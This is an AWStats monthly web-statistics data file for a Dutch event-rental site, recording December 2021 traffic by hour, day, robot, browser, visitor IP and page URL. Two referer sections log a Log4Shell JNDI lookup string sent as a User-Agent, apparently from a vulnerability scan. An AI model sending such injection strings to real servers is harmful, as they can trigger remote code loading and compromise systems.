AWSTATS DATA FILE 7.6 (build 20161204)
# If you remove this file, all statistics for date 202112 will be lost/reset.
# Last config file used to build this data file was /home/u10448d24532/domains/rentforevents.nl/awstats/.data/awstats.rentforevents.nl.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 30
POS_GENERAL 2114                
POS_TIME 2793                
POS_VISITOR 10214               
POS_DAY 18876               
POS_DOMAIN 3571                
POS_LOGIN 3801                
POS_ROBOT 3956                
POS_WORMS 4924                
POS_EMAILSENDER 5055                
POS_EMAILRECEIVER 5198                
POS_SESSION 19639               
POS_SIDER 19840               
POS_FILETYPES 5333                
POS_DOWNLOADS 5508                
POS_OS 5556                
POS_BROWSER 5934                
POS_SCREENSIZE 7911                
POS_UNKNOWNREFERER 7985                
POS_UNKNOWNREFERERBROWSER 8489                
POS_ORIGIN 8729                
POS_SEREFERRALS 8871                
POS_PAGEREFS 9051                
POS_SEARCHWORDS 9395                
POS_KEYWORDS 9547                
POS_MISC 2456                
POS_ERRORS 9606                
POS_CLUSTER 3657                
POS_SIDER_403 9725                
POS_SIDER_400 9823                
POS_SIDER_404 9905                
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20220101015950 23 3665 11419034576371
FirstTime 20211201050749
LastTime 20211231191849
LastUpdate 20220101051838 23 0 22 0 0
TotalVisits 239                 
TotalUnique 217                 
MonthHostsKnown 0                   
MonthHostsUnknown 217                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 13 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 16 16 32141 10 10 9810
1 19 29 224880 21 30 29790
2 127 136 170237 16 69 45577
3 87 87 113278 22 64 60706
4 5 5 9287 18 23 38051
5 11 11 22282 10 23 16225
6 10 10 18237 18 27 23391
7 5 15 196542 11 23 26093
8 6 6 13967 28 34 30527
9 19 30 297166 15 35 102864
10 7 14 124751 12 18 11453
11 4 4 7246 19 27 28573
12 27 27 128670 379 391 845752
13 14 19 96844 259 276 601219
14 18 28 207726 29 38 59259
15 8 18 198909 32 54 465217
16 2 2 3580 18 28 46008
17 1 1 1790 1 1 4568
18 15 15 27187 18 32 25482
19 104 114 375631 120 129 66873
20 10 10 20318 60 109 125325
21 18 19 34168 460 898 1349736
22 17 17 32422 284 557 830083
23 77 77 109458 84 99 69413
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 1
ip 627 710 2466717
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 21
Velen 714 1801891 20211209222629 0
MegaIndex\.ru/ 594 1372779 20211201130538 0
Googlebot/ 72 138467 20211231130132 0
bingbot/ 59 137597 20211231201741 0
YandexBot/ 52 178644 20211226163235 0
Googlebot\-Image/ 18 50289 20211231130133 0
AhrefsBot/ 14 25060 20211231082349 0
bingpreview 9 398063 20211208153740 0
facebookexternalhit/ 8 14696 20211231143843 0
no_user_agent 7 31976 20211229042435 0
(firefox/)([0-9]\.|[0-1][0]\.) 5 22840 20211228030937 0
MSIE[\x20]6 1 1790 20211209192836 0
curl 1 457 20211209083301 0
DuckDuckGo\-Favicons\-Bot/ 3 5132 20211227183611 0
dataprovider\.com 6 73237 20211216091524 0
python 2 3580 20211203011556 0
archive\.org_bot 2 8818 20211222153944 0
Go\-http\-client/ 1 1790 20211209105039 0
YandexImages/ 1 22927 20211219020756 0
^mozilla\/5\.0$ 2 9136 20211227143203 0
netcraft 2 9056 20211207015632 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 6
css 9 27288 0 0
php 475 788634 0 0
png 55 846327 0 0
html 1 369 0 0
Unknown 151 337136 0 0
woff2 19 466963 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 0
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 22
androidpie 1 1
winlong 8 8
macosx11 1 1
androidnougat 1 1
winxp 15 14
ios_iphone 2 2
androidlollipop 1 1
android 29 9
macosx9 6 6
macosx13 68 63
macosx15 81 80
macosx14 48 47
macosx12 1 1
linuxubuntu 2 2
linux 139 112
win7 65 60
macosx 43 41
androidfroyo 1 1
win8.1 11 11
Unknown 18 18
win10 161 140
macosx8 8 8
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 94
opera10.54 11 10
firefox57.0 1 1
firefox74.0 3 3
chrome80.0.3987.163 2 2
chrome84.0.4147.125 1 1
chrome80.0.3987.122 1 1
chrome5.0.375.99 2 2
chrome81.0.4044.113 2 2
chrome81.0.4044.129 1 1
chrome85.0.4183.121 2 2
chrome79.0.3945.117 20 19
chrome74.0.3687.0 8 8
chrome83.0.4103.97 91 91
firefox85.0 2 2
msie8.0 1 1
opera10.10 8 8
chrome57.0.2987.110 1 1
chrome80.0.3987.87 7 7
chrome90.0.4430.72 10 8
firefox73.0 49 49
chrome27.0.1453.90 1 1
firefox73.0.1 1 1
chrome79.0.3945.130 7 7
chrome76.0.3809.71 13 3
chrome70.0.3538.80 1 1
safari14.0.3 3 3
chrome91.0.4472.114 45 44
chrome96.0.4664.55 15 4
firefox79.0 1 1
opera11.11 12 12
chrome90.0.4430.93 24 24
chrome90.0.4430.85 16 16
chrome88.0.4324.150 1 1
chrome88.0.4324.190 4 4
firefox55.0 1 1
chrome81.0.4044.92 11 4
firefox72.0 8 8
chrome89.0.4389.128 7 7
firefox77.0 5 5
chrome60.0.3112.107 1 1
chrome81.0.4044.122 2 2
firefox78.0 4 4
chrome90.0.4427.0 1 1
firefox68.0 1 1
firefox75.0 4 3
mozilla 15 15
chrome94.0.4606.61 8 8
firefox80.0 2 2
firefox87.0 16 16
chrome35.0.1916.47 6 6
chrome84.0.4147.105 23 22
chrome60.0.3112.90 11 11
chrome90.0.4430.86 1 1
safari 2 2
chrome83.0.4103.116 3 3
chrome96.0.4664.92 15 5
chrome87.0.4280.88 4 4
android 1 1
firefox52.0 1 1
firefox62.0 1 1
chrome87.0.4280.141 3 3
chrome87.0.4280.66 2 2
chrome96.0.4664.104 14 4
chrome80.0.3987.106 2 2
chrome26.0.1410.65 8 8
firefox94.0 1 1
chrome34.0.1847.116 7 7
chrome74.0.3729.169 33 33
chrome85.0.4183.83 1 1
msie9.0 2 2
chrome16.0.912.63 1 1
Unknown 3 3
opera11.61 1 1
firefox82.0 1 1
chrome96.0.4664.110 34 9
firefox84.0 2 2
opera11.00 5 5
firefox89.0 2 2
chrome78.0.3904.108 5 5
firefox76.0 3 1
chrome79.0.3945.74 7 7
chrome80.0.3987.149 2 2
firefox83.0 1 1
chrome45.0.2454.94 1 1
chrome61.0.3163.79 2 2
chrome86.0.4240.198 4 4
opera10.00 9 8
firefox81.0 5 5
chrome92.0.4515.159 17 17
chrome89.0.4389.90 2 2
firefox86.0 1 1
chrome80.0.3987.132 1 1
opera11.50 4 4
chrome88.0.4324.146 3 3
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 5
Mozilla/5.0_(compatible;_Let's_Encrypt_validation_server;__https://www.letsencrypt.org) 20211227143024
${jndi:ldap://sidn-divd-c71gdduj8c872ovtlcng_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/} 20211222110631
Mozilla/5.0_(compatible;_CensysInspect/1.1;__https://about.censys.io/) 20211226233207
Mozilla/5.0_(compatible;_Google-Site-Verification/1.0) 20211208212848
Vimexx-Letsencrypt/1.0.0 20211227143006
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 2
${jndi:ldap://sidn-divd-c71gdduj8c872ovtlcng_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/} 20211222110631
Vimexx-Letsencrypt/1.0.0 20211227143006
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 372 381
From1 18 18
From2 4 4
From3 26 26
From4 207 281
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 2
www_google_com 3 3
www_bing_com 1 1
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 7
http://185.104.29.54 9 9
http://rentforevent.nl 8 8
http://www.rentforevent.nl 5 5
https://lm.facebook.com 1 1
https://www.klfd.net 1 1
https://rentforevent.nl 1 1
https://www.rentforevent.nl 1 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 0
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 0
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 3
403 12 4380
302 350 120796
301 1047 473577
END_ERRORS

# URL with 403 errors - Hits - Last URL referrer
BEGIN_SIDER_403 1
/groupImg/ 12 -
END_SIDER_403

# URL with 400 errors - Hits - Last URL referrer
BEGIN_SIDER_400 0
END_SIDER_400

# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 0
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 217
54.196.194.235 182 191 220631 20211224030703
23.95.227.11 29 29 13253 20211217155655
46.166.182.116 24 24 119709 20211207122957
2a07:10c0:0:c005:70::1084 22 22 42523 20211213230953
2a07:10c0:0:c005:70::1081 22 22 42523 20211213231013
144.217.135.154 12 12 65115 20211216090236
34.245.147.228 9 9 18102 20211228221912
2a00:d78:0:14e::4 9 9 18564 20211204001916
94.198.154.28 9 9 18564 20211204001916
94.198.159.216 9 9 18564 20211204190629
185.27.99.141 1 1 1790 20211212182036
54.188.136.151 1 1 1790 20211228191458
52.38.34.112 1 1 1790 20211219192238
54.89.82.140 1 1 1790 20211211033610
54.68.157.194 1 1 1790 20211208192942
34.221.247.8 1 1 1790 20211216191002
185.27.99.118 1 1 1790 20211207010214
54.203.91.217 1 1 1790 20211223191628
34.210.88.67 2 2 3580 20211220192041
93.158.92.233 1 1 1790 20211220061618
52.43.46.153 1 1 1790 20211216191136
3.145.81.225 6 7 13772 20211206211900
192.71.2.171 1 1 1790 20211215130407
18.237.118.167 1 1 1790 20211205191742
192.71.225.127 1 1 1790 20211215130406
35.87.118.195 1 1 1790 20211229194056
93.158.91.228 1 1 1790 20211222014737
52.36.93.147 1 1 1790 20211206191239
2a01:4f9:c011:3f75::1 1 1 1790 20211225192259
45.129.18.23 1 1 457 20211202025945
192.71.30.89 2 2 3580 20211215130407
34.220.198.24 1 1 1790 20211229190747
2.56.59.142 2 2 3580 20211215010750
94.181.167.55 1 1 4528 20211229140053
35.164.200.157 1 1 1790 20211223191025
54.189.96.67 1 1 1790 20211221192205
162.55.33.182 1 1 2603 20211202120955
34.221.79.107 2 2 3580 20211224192351
54.187.238.173 1 1 1790 20211220193230
35.88.249.121 1 1 1790 20211219190939
54.213.152.114 1 1 1790 20211223194403
2a06:2ec0:1::104 2 2 524 20211227143006
3.236.147.18 1 1 1790 20211204034716
34.223.229.192 1 1 1790 20211225192543
185.27.99.116 1 1 1790 20211229184207
46.101.9.216 7 7 15122 20211205054035
45.129.18.25 1 1 457 20211207115713
130.255.166.97 1 1 1790 20211225034139
34.217.174.136 1 1 1790 20211210190641
34.140.90.25 1 1 1790 20211212030037
54.202.63.136 1 1 1790 20211203192526
54.197.76.131 1 1 1790 20211218044222
2600:1f16:269:da00:e45:a547:1761:71 1 1 406 20211227143024
35.87.25.124 1 1 1790 20211208193002
34.122.147.252 1 1 1790 20211201230254
175.44.42.190 1 1 1790 20211213173950
34.219.172.26 1 1 1790 20211228191212
52.39.104.33 1 1 1790 20211209193756
212.227.12.174 3 3 5370 20211213204639
54.184.239.254 1 1 1790 20211206191122
2a01:4f9:c010:1114::1 1 1 1790 20211224184506
2a03:94e0:ffff:185:181:60:0:12 1 1 1790 20211221024010
45.144.225.199 3 3 5370 20211213153921
37.0.11.57 3 3 5370 20211215065517
54.214.152.111 1 1 1790 20211225191702
109.37.157.0 5 15 195815 20211210011520
35.88.92.11 1 1 1790 20211209193837
34.247.68.25 2 2 3917 20211213215909
54.186.21.112 1 1 1790 20211209193757
69.160.160.55 3 10 118924 20211210102434
52.13.42.78 1 1 1790 20211221193452
93.158.91.247 1 1 1790 20211223132154
35.89.15.221 1 1 1790 20211218191056
2600:1f16:269:da02:295d:8c92:b202:43ac 1 1 406 20211227143017
54.214.153.5 1 1 1790 20211220191956
34.222.252.173 1 1 1790 20211201191418
34.254.201.30 2 2 3917 20211213073754
2600:1f14:804:fd01:26e9:d143:22f9:90af 1 1 404 20211227143017
34.220.251.111 1 1 1790 20211204195301
54.188.196.161 2 2 3580 20211221193738
51.89.227.251 2 2 3580 20211217055401
34.209.152.160 1 1 1790 20211203192604
35.202.38.62 1 1 1790 20211201230734
204.12.225.77 2 2 3400 20211228003902
34.209.222.69 1 1 1790 20211223191711
2600:3000:1511:200::1d 1 1 406 20211227143017
43.130.60.160 1 1 1790 20211230091408
2a01:4f9:6a:14d5::2 2 2 3580 20211212213741
52.12.120.66 4 4 7160 20211224135844
185.138.241.66 4 4 7160 20211214032228
167.94.138.60 2 2 3580 20211226233207
92.109.208.178 4 14 194058 20211229143715
18.237.213.102 1 1 1790 20211222193233
52.210.239.88 2 2 3917 20211213041153
54.187.47.167 1 1 1790 20211210190707
34.217.128.74 1 1 1790 20211231191718
54.71.97.22 2 2 3580 20211222193030
34.217.191.110 3 3 5370 20211226212446
34.251.99.107 2 2 3917 20211212022402
91.227.68.179 1 1 457 20211205112119
185.27.99.138 3 3 5370 20211229184208
45.129.18.55 1 1 457 20211202025946
45.129.18.182 1 1 457 20211228081027
54.89.76.201 3 13 192625 20211218072407
35.87.106.129 1 1 1790 20211226212443
2a01:4f8:c0c:7857::1 1 1 1790 20211228025111
20.39.35.179 1 1 1790 20211231184226
34.217.126.242 1 1 1790 20211201192127
35.85.217.169 1 1 1790 20211206190823
131.224.251.102 4 15 221125 20211220093557
192.36.248.249 1 1 1790 20211205102715
212.127.238.119 1 1 4568 20211230014816
34.222.30.146 1 1 1790 20211217192506
20.126.158.82 1 1 4542 20211222110631
37.113.62.111 1 1 4528 20211211200327
185.27.99.125 1 1 1790 20211207010214
34.216.159.198 1 1 1790 20211216190948
93.158.90.74 1 1 1790 20211231020327
185.27.99.137 1 1 1790 20211229184208
2a01:4f9:6a:14d2::2 1 1 1790 20211230030007
2a01:4f8:c0c:3f26::1 1 1 1790 20211226191046
93.158.92.206 1 1 1790 20211220061619
52.12.64.131 1 1 1790 20211223191130
34.212.43.108 1 1 1790 20211229193949
54.216.117.160 2 2 3917 20211212063014
45.129.18.71 1 1 457 20211229022701
34.215.178.32 1 1 1790 20211227200137
74.125.151.154 1 1 1790 20211208212848
185.27.99.140 1 1 1790 20211229184208
34.222.46.182 1 1 1790 20211204195501
3.249.129.99 2 2 3917 20211211130847
35.224.151.55 1 1 1790 20211201230656
2a05:d014:3ad:700:2636:9bd6:4525:3c72 1 1 406 20211227143023
23.148.145.22 2 2 3580 20211209232753
195.133.18.227 3 3 5370 20211215103904
54.221.27.173 1 1 1790 20211227210641
34.215.177.252 1 1 1790 20211221192503
176.53.218.64 1 1 1790 20211228185049
34.135.108.119 1 1 1790 20211201160205
185.27.99.145 1 1 1790 20211207010214
34.213.66.245 1 1 1790 20211229193932
52.27.153.66 2 2 3580 20211225191725
72.167.105.198 1 1 1790 20211225180546
2a01:4f9:6a:14d1::2 1 1 1790 20211206125634
54.195.46.154 2 2 3917 20211211181721
65.154.226.165 3 13 192625 20211227152122
54.212.86.3 1 1 1790 20211218191114
34.212.249.17 1 1 1790 20211229192619
35.87.13.87 1 1 1790 20211211191319
35.87.178.236 1 1 1790 20211211192125
2600:3000:2710:200::1d 1 1 406 20211227143024
54.191.189.236 1 1 1790 20211209193824
2600:1f14:804:fd02:dcdc:391a:9b83:9c03 1 1 406 20211227143024
34.221.138.229 1 1 1790 20211229193532
176.113.43.134 1 1 1790 20211228185048
54.71.177.245 1 1 1790 20211216190949
35.85.154.112 1 1 1790 20211220191729
54.68.22.3 1 1 1790 20211206190844
35.207.253.94 2 2 3580 20211201194205
35.88.68.59 1 1 1790 20211230190902
5.44.168.64 3 3 9593 20211209083305
93.158.92.234 1 1 1790 20211220061619
93.158.92.217 1 1 1790 20211204223026
104.236.205.248 2 2 9136 20211222090844
34.244.236.231 2 2 3917 20211212083055
54.253.186.218 2 2 3580 20211201192907
93.158.92.222 1 1 1790 20211229144408
34.209.44.200 1 1 1790 20211231191849
35.87.180.52 1 1 1790 20211205191745
18.236.236.179 1 1 1790 20211223192145
52.43.40.118 1 1 1790 20211222191918
34.217.128.122 1 1 1790 20211225192507
35.87.21.189 1 1 1790 20211229193422
176.53.217.2 1 1 1790 20211227183143
192.71.12.140 1 1 1790 20211217020610
89.104.110.63 2 2 3580 20211228203135
54.245.57.171 1 1 1790 20211211192447
2a05:d014:3ad:702:5e21:33c4:d5b3:ec3a 1 1 406 20211227143017
130.255.166.122 1 1 1790 20211206105834
176.74.192.85 1 1 1790 20211208061340
74.125.151.86 1 1 369 20211208212847
212.192.241.13 1 1 1790 20211221180951
34.210.189.116 1 1 1790 20211222193035
34.220.56.215 1 1 1790 20211231191413
54.194.61.187 3 13 192387 20211228190422
54.195.37.202 2 2 10392 20211210024943
192.71.10.105 1 1 1790 20211215130407
18.237.234.84 1 1 1790 20211201191426
124.126.78.162 1 1 4568 20211222123720
34.220.80.3 1 1 1790 20211225191737
52.32.48.4 1 1 1790 20211223193220
185.138.241.180 4 4 7160 20211213225430
54.187.5.31 1 1 1790 20211229190926
18.237.34.13 1 1 1790 20211230191219
93.158.91.189 1 1 1790 20211214001016
54.74.210.227 1 1 1790 20211205051317
176.53.218.135 1 1 1790 20211227183141
136.144.41.85 1 1 1790 20211210040949
91.208.197.96 1 1 1790 20211210045127
18.236.163.176 1 1 1790 20211231191637
77.247.127.202 1 1 1790 20211202020949
35.88.220.154 1 1 1790 20211223192209
34.220.180.62 1 1 1790 20211221193031
54.217.14.198 3 3 5050 20211228205804
54.213.123.100 1 1 1790 20211210190651
2a01:4f9:6a:14d4::2 2 2 3580 20211217224232
35.88.57.100 1 1 1790 20211208193138
93.158.92.202 1 1 1790 20211220061618
54.202.106.128 1 1 1790 20211208192949
167.248.133.42 2 2 3580 20211212210105
54.201.231.62 1 1 1790 20211218191335
54.189.97.174 2 2 3580 20211229193356
2a00:d78:0:710:94:198:159:216 8 8 16774 20211204190632
93.158.91.254 1 1 1790 20211226161132
2001:1c05:3085:c900:21e5:c61f:6f10:59fb 3 8 76817 20211222132247
167.248.133.113 1 1 1790 20211220235824
176.53.219.90 2 2 3580 20211227200213
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 31
20211201 12 12 21480 10
20211202 10 10 17274 7
20211203 12 12 23934 4
20211204 25 25 50885 10
20211205 12 12 22739 6
20211206 12 13 24512 7
20211207 30 30 129116 7
20211208 9 9 13356 9
20211209 9 9 20333 6
20211210 15 32 334081 8
20211211 36 36 33194 9
20211212 16 16 28318 12
20211213 58 58 111117 10
20211214 7 7 12530 4
20211215 7 7 12530 7
20211216 16 16 72275 5
20211217 6 6 9407 5
20211218 7 17 199785 5
20211219 2 2 3580 2
20211220 14 25 239025 10
20211221 8 8 14320 7
20211222 13 18 105803 9
20211223 9 9 16110 9
20211224 189 198 233161 4
20211225 9 9 16110 8
20211226 8 8 14320 5
20211227 19 29 207135 15
20211228 25 35 231926 11
20211229 21 31 225893 17
20211230 5 5 11728 5
20211231 6 6 10740 6
END_DAY

# Session range - Number of visits
BEGIN_SESSION 6
5mn-15mn 2
2mn-5mn 8
30s-2mn 5
0s-30s 222
15mn-30mn 1
30mn-1h 1
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 77
/ 414 629622 226 207
/algemene-info/ 25 64147 0 10
/klantenservice/afhalen/ 15 43314 0 7
/klantenservice/betalen 14 36471 0 0
/klantenservice/openingstijden/ 9 25370 0 0
/klantenservice/retourneren 8 28599 1 1
/verhuur/keukenapparatuur 8 18820 0 1
/verhuur/dranken 8 17886 1 1
/klantenservice/bestellen 7 23775 0 0
/offerte 7 12916 0 1
/verhuur/keukenapparatuur/potten-pannen/ 1 2285 0 0
/verhuur/tafelgerei/buffetmaterialen 1 1598 0 0
/verhuur/inrichting/thema-suit-dress 1 2189 0 0
/verhuur/catering/tussendoortjes 1 1609 0 0
/verhuur/tafelgerei/bestek 1 1572 0 0
/verhuur/inrichting/thema-black-white-wood 1 2027 0 0
/verhuur/keukenapparatuur/gn-bakken/ 1 2480 0 0
/verhuur/keukenapparatuur/warme-dranken 1 2224 0 0
/verhuur/keukenapparatuur/ovens/ 1 2137 0 0
/verhuur/facilitair/veiligheid 1 1798 0 0
/verhuur/keukenapparatuur/snackmachines/ 1 1912 0 0
/verhuur/tafelgerei 5 11010 0 0
/verhuur/horecamaterialen/mobiele-barren 1 1879 0 0
/verhuur/inrichting/inrichting-basics 1 2478 0 0
/verhuur/inrichting/afscheidingen 1 2090 0 0
/verhuur/keukenapparatuur/koelen-vriezen 1 2043 0 0
/verhuur/keukenapparatuur/keuken-warmhouden/ 2 4989 0 0
/verhuur/keukenapparatuur/bbq 1 2048 0 0
/verhuur/keukenapparatuur/keukenlijn-modulair 1 2309 0 0
/verhuur/verbruik/kaarsen 1 1638 0 0
/verhuur/keukenapparatuur/potten-pannen 1 2285 0 0
/verhuur/inrichting/thema-sloophout 1 2276 0 0
/verhuur/horecamaterialen/koelkasten 1 1730 0 0
/verhuur/facilitair/betalingen 1 1797 0 0
/verhuur/keukenapparatuur/ 1 1769 0 0
/verhuur/tafelgerei/tafeldecoratie 1 1676 0 0
/verhuur/facilitair/water 1 1752 0 0
/verhuur/facilitair/afvalverwerking 1 1867 0 0
/verhuur/keukenapparatuur/koelen-vriezen/ 1 2043 0 0
/verhuur/keukenapparatuur/kitchen-basics 1 2078 0 0
/verhuur/tafelgerei/servies 1 1626 0 0
/.well-known/acme-challenge/9jA8YU3-cLH5_GMyTRHSD1ilwh-Umc-ikmnVUXhZbJ8 4 1622 4 4
/verhuur/inrichting/vergaderen 1 1824 0 0
/verhuur/dranken/koffie-thee 1 2059 0 0
/verhuur/keukenapparatuur/ovens 1 2137 0 0
/verhuur/artikel/au-bain-marie-met-sausbakken-2x4-5l 1 2672 1 0
/verhuur/horecamaterialen/barmaterialen 2 3537 0 0
/algemene-info 5 14213 0 0
/verhuur/keukenapparatuur/koken-bakken/ 1 1985 0 0
/verhuur/facilitair/schoonmaken 1 2304 0 0
/verhuur/catering 5 9902 0 0
/klantenservice/transport 6 20741 0 0
/verhuur/inrichting/thema-black-white 1 2510 0 0
/verhuur/dranken/niet-alcoholische-dranken 1 1568 0 0
/verhuur/keukenapparatuur/koken-bakken 2 4089 0 1
/verhuur/inrichting/thema-steigerhout 1 1740 0 0
/verhuur/inrichting 5 12768 0 0
/verhuur/dranken/alcoholische-dranken 1 1575 0 0
/verhuur/horecamaterialen 6 12197 0 0
/verhuur/verbruik/koolzuur-gas 1 1642 0 0
/verhuur/keukenapparatuur/snackmachines 1 1912 0 0
/.well-known/acme-challenge/testleplugin 2 524 1 1
/verhuur/verbruik 5 10484 0 0
/verhuur/keukenapparatuur/bbq/ 1 2048 0 0
/verhuur/facilitair/stroom 1 2199 0 0
/verhuur/tafelgerei/glaswerk 1 1615 0 0
/verhuur/keukenapparatuur/gn-bakken 1 2480 0 0
/verhuur/verbruik/disposables 1 1725 0 0
/verhuur/keukenapparatuur/keukenlijn-modulair/ 1 2309 0 0
/verhuur/inrichting/thema-marktterras 1 1921 0 0
/verhuur/inrichting/thema-colour 1 1802 0 0
/verhuur/keukenapparatuur/warme-dranken/ 1 2224 0 0
/.well-known/acme-challenge/-F7nQowT8hCXADOaJFIg84wSOcT2RkHg7tSPVAg60bE 4 1624 4 4
/verhuur/keukenapparatuur/keuken-warmhouden 1 2435 0 0
/verhuur/keukenapparatuur/frituren 2 3943 0 0
/google5f1b2261bbe99b0d.html 1 369 1 1
/verhuur/facilitair 5 11306 0 0
END_SIDER
